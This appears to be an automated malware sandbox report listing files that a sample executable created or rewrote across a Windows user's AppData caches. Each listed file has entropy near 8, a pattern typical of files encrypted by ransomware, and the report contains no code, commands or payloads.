                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\INetCache\MSIMGSIZ.DAT entropy: 7.99679822575Jump to dropped file
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AppData\Indexed DB\edb.log entropy: 7.99884667625Jump to dropped file
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AppData\Indexed DB\edbres00001.jrs entropy: 7.9987551319Jump to dropped file
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AppData\Indexed DB\edbres00002.jrs entropy: 7.99869494654Jump to dropped file
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AppData\Indexed DB\edbtmp.log entropy: 7.99884001073Jump to dropped file
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AppData\Indexed DB\IndexedDB.edb entropy: 7.99885012555Jump to dropped file
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache132748172358346066.txt entropy: 7.99837587957Jump to dropped file
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache132748172368747068.txt entropy: 7.99827788071Jump to dropped file
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\DeviceSearchCache\SettingsCache.txt entropy: 7.99887559482Jump to dropped file
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Low\IE\86B850Z5\39ab3103-8560-4a55-bfc4-401f897cf6f2[1].jpg entropy: 7.99732802354Jump to dropped file
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Low\IE\86B850Z5\4UabrENHsxJlGDuGo1OIlLU94bt3[1].woff entropy: 7.99785353157Jump to dropped file
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Low\IE\86B850Z5\4UaGrENHsxJlGDuGo1OIlI3K[1].woff entropy: 7.99799101487Jump to dropped file
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Low\IE\86B850Z5\ai.0[1].js entropy: 7.99777991038Jump to dropped file
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Low\IE\86B850Z5\azuremediaplayer.min[1].js entropy: 7.99874540564Jump to dropped file
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Low\IE\86B850Z5\chrome_safari-behavior[1].jpg entropy: 7.99016799221Jump to dropped file
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Low\IE\86B850Z5\edge[1].htm entropy: 7.9988340364Jump to dropped file
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Low\IE\86B850Z5\fcmain[1].js entropy: 7.99524550263Jump to dropped file
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Low\IE\86B850Z5\http___cdn.taboola.com_libtrc_static_thumbnails_36b0b1647b5d32d31e6541b2c6227890[1].jpg entropy: 7.99237217699Jump to dropped file
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Low\IE\86B850Z5\js[1].js entropy: 7.99853637133Jump to dropped file
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Low\IE\86B850Z5\js[2].js entropy: 7.99834065397Jump to dropped file
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Low\IE\86B850Z5\launch-EN7b3d710ac67a4a1195648458258f97dd.min[1].js entropy: 7.99896302563Jump to dropped file
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Low\IE\86B850Z5\lottie[1].js entropy: 7.99882533057Jump to dropped file
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Low\IE\86B850Z5\main.v2.min[1].css entropy: 7.99871114507Jump to dropped file
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Low\IE\86B850Z5\medianet[1].htm entropy: 7.99848313352Jump to dropped file
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Low\IE\86B850Z5\medianet[2].htm entropy: 7.99874428639Jump to dropped file
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Low\IE\86B850Z5\n_C4vBfAV3O9RfkGjfduaZoxjAs[1].jpg entropy: 7.99020956624Jump to dropped file
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Low\IE\86B850Z5\oneplayer[1].css entropy: 7.99833216105Jump to dropped file
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Low\IE\86B850Z5\oneplayer[1].js entropy: 7.99882018726Jump to dropped file
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Low\IE\86B850Z5\otTCF-ie[1].js entropy: 7.99820178134Jump to dropped file
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Low\IE\86B850Z5\pixel_tablet[1].png entropy: 7.99584441339Jump to dropped file
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Low\IE\86B850Z5\RC5bdddb231cf54f958a5b6e76e9d8eeea-source.min[1].js entropy: 7.99180662236Jump to dropped file
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Low\IE\86B850Z5\RE4FBmQ[1].jpg entropy: 7.99828686822Jump to dropped file
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Low\IE\86B850Z5\RE4ncJa[1].jpg entropy: 7.99897867564Jump to dropped file
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Low\IE\86B850Z5\RE4sQww[1].jpg entropy: 7.99869732912Jump to dropped file
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Low\IE\86B850Z5\RE4tKUA[1].jpg entropy: 7.99822268023Jump to dropped file
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Low\IE\86B850Z5\RE4zuiC[1].jpg entropy: 7.99684931243Jump to dropped file
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Low\IE\86B850Z5\search[1].htm entropy: 7.99868162243Jump to dropped file
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Low\IE\KD8PQN1H\4996b9[1].woff entropy: 7.99578404753Jump to dropped file
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Low\IE\KD8PQN1H\67-bf2297[1].css entropy: 7.99891815741Jump to dropped file
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Low\IE\KD8PQN1H\auction[1].htm entropy: 7.99294730346Jump to dropped file
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Low\IE\KD8PQN1H\css[1].css entropy: 7.99766108853Jump to dropped file
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Low\IE\KD8PQN1H\fe-a5cf09[1].js entropy: 7.99862979143Jump to dropped file
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Low\IE\KD8PQN1H\f[3].txt entropy: 7.99369139462Jump to dropped file
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Low\IE\KD8PQN1H\gtm[1].js entropy: 7.99843584087Jump to dropped file
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Low\IE\KD8PQN1H\homepage_tools[1].png entropy: 7.9910957192Jump to dropped file
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Low\IE\KD8PQN1H\installer.min[1].js entropy: 7.99635513587Jump to dropped file
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Low\IE\KD8PQN1H\jquery-2.1.1.min[1].js entropy: 7.99724889472Jump to dropped file
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Low\IE\KD8PQN1H\jquery[1].js entropy: 7.99805769142Jump to dropped file
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Low\IE\KD8PQN1H\jsll-4[1].js entropy: 7.99650416122Jump to dropped file
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Low\IE\KD8PQN1H\js[1].js entropy: 7.99776833739Jump to dropped file
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Low\IE\KD8PQN1H\mwf-auto-init-main.var.min[1].js entropy: 7.99892778267Jump to dropped file
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Low\IE\KD8PQN1H\mwfmdl2-v3.54[1].woff entropy: 7.99283264913Jump to dropped file
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Low\IE\KD8PQN1H\otPcCenter[1].json entropy: 7.99763764177Jump to dropped file
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Low\IE\KD8PQN1H\RE4FGwC[1].jpg entropy: 7.99854873028Jump to dropped file
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Low\IE\KD8PQN1H\RE4nqTh[1].png entropy: 7.99204049295Jump to dropped file
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Low\IE\KD8PQN1H\RE4tMOM[1].jpg entropy: 7.99834226745Jump to dropped file
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Low\IE\OHV7M0FR\58-acd805-185735b[1].css entropy: 7.99881274164Jump to dropped file
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Low\IE\OHV7M0FR\85-0f8009-68ddb2ab[1].js entropy: 7.99882651445Jump to dropped file
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Low\IE\OHV7M0FR\analytics[1].js entropy: 7.99553995062Jump to dropped file
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Low\IE\OHV7M0FR\big_pixel_phone[1].png entropy: 7.99358848529Jump to dropped file
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Low\IE\OHV7M0FR\fcmain[1].js entropy: 7.99517871953Jump to dropped file
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Low\IE\OHV7M0FR\https___native-images.s3.amazonaws.com_2081faa92bea3a1c66c71d1186554cf7[1].jpg entropy: 7.99486305057Jump to dropped file
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Low\IE\OHV7M0FR\https___native-images.s3.amazonaws.com_b19d850a8266850b27638eeb08c63d4f[1].jpg entropy: 7.99390978456Jump to dropped file
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Low\IE\OHV7M0FR\http___cdn.taboola.com_libtrc_static_thumbnails_3bf6ad926e2bc7240e397ff4ea2158f8[1].jpg entropy: 7.99598970777Jump to dropped file
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Low\IE\OHV7M0FR\http___cdn.taboola.com_libtrc_static_thumbnails_3ed7b7bb5bff384ff0ec5b3bb7810dde[1].jpg entropy: 7.99537447593Jump to dropped file
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Low\IE\OHV7M0FR\http___cdn.taboola.com_libtrc_static_thumbnails_831afd7b16ef15301070d350663f9c7a[1].jpg entropy: 7.9906487818Jump to dropped file
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Low\IE\OHV7M0FR\http___cdn.taboola.com_libtrc_static_thumbnails_ae71c2d9935c4845ec05c736721d67b8[1].jpg entropy: 7.99040847194Jump to dropped file
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Low\IE\OHV7M0FR\iab2Data[1].json entropy: 7.99868570094Jump to dropped file
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Low\IE\OHV7M0FR\KFOlCnqEu92Fr1MmEU9vAA[1].woff entropy: 7.99731574208Jump to dropped file
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Low\IE\OHV7M0FR\KFOmCnqEu92Fr1Me5g[1].woff entropy: 7.9971035956Jump to dropped file
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Low\IE\OHV7M0FR\RE4tIoY[1].jpg entropy: 7.99863030045Jump to dropped file
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Low\IE\X2GCHJOK\autotrack[1].js entropy: 7.99268913991Jump to dropped file
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Low\IE\X2GCHJOK\de-ch[1].json entropy: 7.99872034571Jump to dropped file
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Low\IE\X2GCHJOK\f[1].txt entropy: 7.99298795613Jump to dropped file
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Low\IE\X2GCHJOK\main.v2.min[1].js entropy: 7.9976319371Jump to dropped file
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Low\IE\X2GCHJOK\main.v3.min[1].css entropy: 7.99843013189Jump to dropped file
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Low\IE\X2GCHJOK\mwf-main.min[1].css entropy: 7.9987672394Jump to dropped file
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Low\IE\X2GCHJOK\mwfmdl2-v3.07[1].woff entropy: 7.9916316556Jump to dropped file
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Low\IE\X2GCHJOK\nrrV18753[1].js entropy: 7.99829708713Jump to dropped file
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Low\IE\X2GCHJOK\otBannerSdk[1].js entropy: 7.99884701349Jump to dropped file
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Low\IE\X2GCHJOK\RE4FBmV[1].jpg entropy: 7.99890518479Jump to dropped file
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Low\IE\X2GCHJOK\RE4FBmZ[1].jpg entropy: 7.99875737001Jump to dropped file
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Low\IE\X2GCHJOK\RE4tD2S[1].jpg entropy: 7.99876951817Jump to dropped file
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Low\IE\X2GCHJOK\RE4tIoW[1].jpg entropy: 7.99036119656Jump to dropped file
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Low\IE\X2GCHJOK\RE4tMOD[1].jpg entropy: 7.9908356463Jump to dropped file
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Low\IE\X2GCHJOK\RE4wqj5[1].jpg entropy: 7.99857230194Jump to dropped file
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Low\IE\X2GCHJOK\sbi[1].htm entropy: 7.9961972571Jump to dropped file
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Low\IE\X2GCHJOK\thankyou-animation[2].json entropy: 7.99491397893Jump to dropped file
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Low\IE\X2GCHJOK\wcp-consent[1].js entropy: 7.99887236281Jump to dropped file
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\Settings\settings.dat.LOG2 entropy: 7.99517418893Jump to dropped file
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache132748172688006251.txt entropy: 7.99815644199Jump to dropped file
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\AC\INetCache\4VHXUVXJ\Placement[1].json entropy: 7.99706819754Jump to dropped file
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{2b5975db-7e26-4662-a9e8-84951ed922a4}\0.0.filtertrie.intermediate.txt entropy: 7.99228834393Jump to dropped file
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{2b5975db-7e26-4662-a9e8-84951ed922a4}\Apps.ft entropy: 7.99242842773Jump to dropped file
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{2b5975db-7e26-4662-a9e8-84951ed922a4}\Apps.index entropy: 7.99897302107Jump to dropped file
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{698271a8-fd48-418e-b05c-a93ca58fd2e6}\Apps.ft entropy: 7.99301900161Jump to dropped file
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{698271a8-fd48-418e-b05c-a93ca58fd2e6}\Apps.index entropy: 7.99875987451Jump to dropped file
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{bd237dcd-6d0f-41da-b592-06046b8e7fc0}\0.0.filtertrie.intermediate.txt entropy: 7.991504203Jump to dropped file
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{bd237dcd-6d0f-41da-b592-06046b8e7fc0}\Apps.ft entropy: 7.99318223461Jump to dropped file
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{bd237dcd-6d0f-41da-b592-06046b8e7fc0}\Apps.index entropy: 7.99879553971Jump to dropped file
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{c489dd0d-bac7-4129-ae50-28d7b3fe49ef}\appsconversions.txt entropy: 7.99511834209Jump to dropped file
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{c489dd0d-bac7-4129-ae50-28d7b3fe49ef}\appsglobals.txt entropy: 7.99890761372Jump to dropped file
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{c489dd0d-bac7-4129-ae50-28d7b3fe49ef}\appssynonyms.txt entropy: 7.99792630543Jump to dropped file
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{c489dd0d-bac7-4129-ae50-28d7b3fe49ef}\settingsconversions.txt entropy: 7.99440891216Jump to dropped file
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{c489dd0d-bac7-4129-ae50-28d7b3fe49ef}\settingsglobals.txt entropy: 7.99548153507Jump to dropped file
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{c489dd0d-bac7-4129-ae50-28d7b3fe49ef}\settingssynonyms.txt entropy: 7.99731572275Jump to dropped file
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\ConstraintIndex\Settings_{311bc890-0d64-4a61-ae62-e2a43e6cb7e1}\0.0.filtertrie.intermediate.txt entropy: 7.99825041357Jump to dropped file
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\ConstraintIndex\Settings_{311bc890-0d64-4a61-ae62-e2a43e6cb7e1}\Settings.ft entropy: 7.99858428986Jump to dropped file
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\ConstraintIndex\Settings_{311bc890-0d64-4a61-ae62-e2a43e6cb7e1}\Settings.index entropy: 7.99871657342Jump to dropped file
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\ConstraintIndex\Settings_{383cd175-ae3a-4e7b-8db0-9b5863f23264}\0.0.filtertrie.intermediate.txt entropy: 7.99843327987Jump to dropped file
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\ConstraintIndex\Settings_{383cd175-ae3a-4e7b-8db0-9b5863f23264}\Settings.ft entropy: 7.99851528807Jump to dropped file
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\ConstraintIndex\Settings_{383cd175-ae3a-4e7b-8db0-9b5863f23264}\Settings.index entropy: 7.99870693102Jump to dropped file
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{fb9f6bf9-2f80-4c6e-a1dd-e155f09965c9}\0.0.filtertrie.intermediate.txt entropy: 7.9901317447Jump to dropped file
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{fb9f6bf9-2f80-4c6e-a1dd-e155f09965c9}\Apps.ft entropy: 7.9920864871Jump to dropped file
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{fb9f6bf9-2f80-4c6e-a1dd-e155f09965c9}\Apps.index entropy: 7.99901556869Jump to dropped file
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\N5V1ZR9C\1\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_10[1].txt entropy: 7.99534732157Jump to dropped file
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\N5V1ZR9C\1\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_11[1].txt entropy: 7.99864879439Jump to dropped file
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\N5V1ZR9C\1\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_12[1].txt entropy: 7.99469577217Jump to dropped file
